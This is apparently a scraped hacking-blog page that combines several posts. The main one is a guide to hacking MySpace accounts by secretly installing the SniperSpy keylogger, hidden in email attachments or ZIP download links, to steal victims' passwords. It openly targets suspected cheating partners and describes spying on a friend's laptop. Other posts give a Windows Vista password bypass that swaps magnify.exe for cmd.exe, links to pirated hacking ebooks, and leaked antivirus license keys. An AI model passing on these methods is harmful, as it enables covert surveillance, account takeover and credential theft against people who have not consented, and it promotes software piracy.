For the Subscribers : To get your free Mobile Hacking Premium just write comment with your email address that you have used to subscribe and the above Premium Pack will be mailed to you. You need to be a subscriber to get the premium pack. Before Sending the Premium Pack we will be checking for your Authenticity. You will Receive your Premium Pack within 24 hours.


What’s next? Let everyone know to disable Bluetooth until they really need it. Additionally, make sure to update your phone software on a regular basis.

DOWNLOAD 1


DOWNLOAD 2

my space



MySpace is one of the most widely used Social Networking website by many teenagers and adults acropss the globe. I have seen many cheaters create secret Myspace accounts in order to exchange messages with another person and have secret relationships. So, it’s no wonder many people want to know how to hack a Myspace account. In this post you’ll fine the real and working ways to hack a Myspace.


THINGS YOU SHOULD KNOW BEFORE PROCEEDING


With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Myspace: They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts about Myspace hacking.


1. There is no ready made software or program that can hack Myspace just by entering the target username or URL. If you come accross a site that claims to sell a program to hack Myspace then it’s 100% scam.


2. Never trust any Hacking Service that claims to hack a Myspace account just for $100 or $200. Most of them are scams.


The following are the only 2 foolproof methods to hack Myspace.




1. How to Hack Myspace – The Easiest Way


The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. To use a keylogger it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.

1. What is a keylogger?

A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.

2. Where is keylogger program available?

There exists tons of keyloggers on the internet, but most of them are useless and doesn’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation. This can also be used on local computer.

SniperSpy

3. How to install a keylogger?

Keyloggers can be installed just like any other program. At the installation time, you need to set your secret password and hotkey combination, to unhide the keylogger program whenever it is needed. This is because, after installation the keylogger becomes completely invisible and start running in the background. Because of it’s stealth behaviour the victim can never come to know about that the presence of the keylogger software on his/her computer.

4. I don’t have physical access to the target computer, can I still use Sniperspy?

It doesn’t matter whether or not you have physical access to the victim’s computer. Because SniperSpy offers Remote Installation Feature. So, you can hack Myspace remotely installing the keylogger on the target PC.

You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. The logs containing these activities are sent to you by the keylogger software via email or FTP.

5. What is the best way to deploy the keylogger onto remote PC?

Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.

6. How can a keylogger hack Myspace account?

You can hack Myspace using keylogger as follows: You install the keylogger on a Remote PC (or on your local PC). The victim is unaware of the presence of the keylogger on his computer. As usual, he logs into his Myspace account by typing the Myspace username and password. These details are recorded and sent to your Sniperspy account. You can login to your Sniperspy account to see the password. Now you have successfully hacked the Myspace account.

In case if you install the keylogger on your local PC, you can obtain the recorded Myspace password just by unhiding the keylogger program.

7. Why SniperSpy is the best?

n my experience of more than 6 years I have tested almost 50 spy softwares. Out of these one of my favorite Spy software is SniperSpy. The following are some of the reasons for which I recommend SniperSpy for you.1. SniperSpy can be used to Spy on your local PC as well as a remote PC since it supports remote installation feature.

2. On the whole Internet there exists only a few spy softwares that support remote installation and SniperSpy is the best among them.

3. You can view the LIVE screenshot of the remote computer. Not only screenshots, but also you can see every activity on the remote comuter LIVE.

4. With SniperSpy you can take a complete control of the remote PC. You can logoff, restart or shutdown the remote PC right from your PC.

5. SniperSpy records every activity of the remote computer.

6. SniperSpy is completely stealth and remains undetected.

7. SniperSpy captures every keystroke that is typed. This includes email passwords, login passwords, instant messenger passwords etc.

8. SniperSpy has the ability to bypass any firewall.

How it Works?

After you purchase the SniperSpy software, you will be able to download the a program that allows you to create a remotely deployable module.



To deploy the module you can attach the exe file to any regular email and send to the remote PC. Modules can be dropped into a Word, Wordpad or Works document, or even a ZIP or RAR file. When the module is executed it will not display anything on the screen if you chose the “Do Not Alert User” option during module creation.

After you have sent the email, wait until the remote user checks their email and executes the module. After the module is executed, activity will begin recording immediately. After activity starts recording it will then be uploaded to your personal SniperSpy web space.


Wait about fifteen minutes after the module has been executed. Then login to your online account. You will be able to view any recorded activity there using a secure https connection. Logs are updated every six minutes. No matter where you are, you can log into your SniperSpy account from any Internet connection.


How effective is SniperSpy?


Once you’ve got the module executed on the target machine, it begins logging keystrokes, websites visited, internet searches, file changes, instant message chats, and taking screenshots of computer activity. I decided to install the module remotely on my friend’s laptop. A few hours after it’s successful installation, I was able to login to the control panel to see the screenshots, keystrokes (includes passwords), websites visited and many more. Whenever he used to come online I was able to monitor has activity LIVE. It was quite amazing to sit at my place and watch his activities remotely.


Improvements in the latest version of SniperSpy


In the older versions of Sniperspy the online control panel was pretty slow taking upto a minute to communicate with the remote computer. This was a bit annoying.


But this problem is fixed in the latest version. In fact it’s extremely fast now!


How is SniperSpy different from other spy softwares?


The following features makes SniperSpy stand out from the crowd


1. Sniper Spy is more reliable than other spy softwares since the logs sent will be received and hosted by SniperSpy servers. You need not rely on your email account to receive the logs.


2. SniperSpy offers excellent customer support.


3. SniperSpy has got recognition from media such as CNN, BBC, CBS, Digit etc. Hence it is more reputed and trustworthy.


Verdict: Sniperspy Internet Monitor Software



This review can only give you an idea of just how powerful SniperSpy really is and how it can help you to monitor internet activity. There is not much that can be hidden from SniperSpy and if you visit their website you will get the complete picture.
There are a few computer remote spying programs available but Sniperspy is without doubt one of the best ones you can buy. Customer support is excellent and if you want peace of mind then this will allow you to find out the truth very quickly.

Check SniperSpy out right now and discover for yourself how much is worth to you compared with the few dollars it costs.

You can get SniperSpy from the following link: SniperSpy Homepage

SniperSpy

Crack password in windows vista


http://www.gadgetell.com/images/2006/11/windows-vista-wallpaper1.jpg
Try to boot from windows vista dvd or if u have oem computer go to repair options !!

Boot to Win RE
Click Command Prompt option.
Type the following command:
C:
CD Windows\system32
ren cmd.exe cmd.old
ren magnify.exe cmd.exe
ren cmd.old magnify.exe
Restart computer
Click on Easy of Access centre left side bottom à Choose Magnify option à Command prompt opens up
Type: net user administrator /active:yes
Restart the computer
Logon on administrator account and then using User Account page, remove password for the other account
Search for Magnify.exe in start search and click on it
Command prompt opens up
Type: net user administrator /active:no
Restart the computer
This will disable the administrator account.
Boot to winRE
Type the following:
C:
CD Windows\system32
ren magnify.exe cmd.old
ren cmd.exe magnify.exe
ren cmd.old cmd.exe
exit
Restart the computer – system logs on to the User account without asking for password provided there is only one user account.

by Mr electroman



http://doos0.com

hacking tutos

1000 Hacker Tutorials 2009 - Full Version



Download


http://rapidshare.com/files/263878352/1000_Hacker_Tutorials_2008.rar


by


Mr electroman


http://dOOS0.Com


windows hacking


Big Book of Windows Hacks
O’Reilly Media, Inc.; 1 edition | ISBN:0596528353 | 652 pages | October 23, 2007 | PDF | 72 Mb

Bigger, better, and broader in scope, the Big Book of Windows Hacks gives you everything you need to get the most out of your Windows Vista or XP system, including its related applications and the hardware it runs on or connects to. Whether you want to tweak Vista’s Aero interface, build customized sidebar gadgets and run them from a USB key, or hack the “unhackable” screensavers, you’ll find quick and ingenious ways to bend these recalcitrant operating systems to your will.

The Big Book of Windows Hacks focuses on Vista, the new bad boy on Microsoft’s block, with hacks and workarounds that also work for Windows XP. You can read each hack in just a few minutes, saving countless hours of searching for the right answer. The step-by-step instructions let you apply the solutions in no time. This book takes you beyond the operating system with hacks for applications like Internet Explorer 7 and Office 2007, and hardware such as the Zune, your wireless router, and the PC itself.



The Big Book of Windows Hacks includes:
Expanded tutorials, new background material, a series of “quick hacks”, and informative sidebars
Security hacks, including protection at wireless hotspots, hacking Vista file permissions and user account protection, and more
Efficiency hacks, such as tweaking your PC hardware, troubleshooting hardware problems, and speeding up system performance
Fun hacks, like building a custom Media Center PC or turning a PC into a digital video recorder
“Beyond Windows” hacks for running Linux inside Vista, dual-booting Linux/Windows or XP/Vista, or emulate classic video games on your PC

In all, this remarkable book contains more than 100 hacks so that the power user in you never again needs to be at the mercy of systems and hardware run by Microsoft’s omnipotent Vista and XP operating systems.


http://rapidshare.com/files/260852366/IndoGear.Com.ebook.Windows_Vista_Hacks.0596528353.zip


http://hotfile.com/dl/9282337/a932062/IndoGear.Com.ebook.Windows_Vista_Hacks.0596528353.zip.html

kaspersky ekys



KIS 2010 New Keys

Kaspersky internet security 2010 Keys
Kaspersky internet security 9 (2010) New Activation Keys

Last KIS 2010 keys update 13/8/2009

http://www.ziddu.com/download/6288601/KIS_9_Keys.rar.html

Download KIS 2010 New Keys

How to Install the Key
-Click on "License" which is down along the bottom next to "Support"
-Click on "Activate new license"
-Enter this expired Beta code: T1JVS-NNMBD-K1QTN-SUBP8 and then it'll result in an error
-When the new window pops up, you are given the option to browse to your activation key.

by Mr electroman


http://doos0.Com







تطوير : مدونة حكمات